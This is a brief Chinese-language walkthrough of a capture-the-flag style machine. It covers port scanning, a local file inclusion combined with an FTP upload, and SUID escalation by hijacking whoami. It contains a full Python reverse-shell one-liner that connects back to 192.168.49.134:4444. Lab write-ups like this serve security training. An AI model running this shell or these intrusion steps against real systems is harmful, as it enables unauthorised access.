nmap -Pn -p- -T4 --min-rate=1000 192.168.134.14

nmap -Pn -p 21,22,80 -sCV 192.168.134.14

80端口是默认页面,先查看21端口FTP服务的匿名登录,并未发现可利用信息。
继续查看80端口,在robots.txt中得到提示。

https://www.howtogeek.com/113439/how-to-change-your-browsers-user-agent-without-installing-any-extensions/

得到一个路径 /secret_information

得到一个本地文件包含漏洞

结合ftp服务,应该是包含ftp服务的内容


上传shell至ftp


反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.134",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

查看SUID时,发现一个可能存在利用的地方

查看时,发现源代码

程序的大致意思是运行whoami检测用户身份,如果是Tom,则rootshell程序会给一个更高权限的用户。
所以只需要劫持whoami,让它输出Tom就可以了。





![[iOS]代码混淆](https://img-blog.csdnimg.cn/d449474ac80a4ff5a0d1349b88bce72f.png)













